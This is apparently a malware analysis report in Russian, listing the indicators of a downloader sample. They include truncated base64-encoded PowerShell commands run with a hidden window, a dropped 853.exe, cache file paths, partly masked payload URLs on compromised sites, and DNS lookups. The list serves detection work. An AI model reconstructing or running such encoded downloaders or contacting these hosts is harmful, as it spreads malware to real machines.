Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\853.exe
- http://ta####ingshop.com/c1/ftcfak9456/
- http://br####ngnomad.blog/wp-content/rssk34971/
- http://tr##ight.io/cylpq/7h0t8/
- http://ow#####luminium.co.zw/wp-admin/wzq9/
- http://ow#####luminium.co.zw/cgi-sys/suspendedpage.cgi
- DNS ASK ta####ingshop.com
- DNS ASK qu####utwall.xyz
- DNS ASK br####ngnomad.blog
- DNS ASK tr##ight.io
- DNS ASK ow#####luminium.co.zw
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...' (со скрытым окном)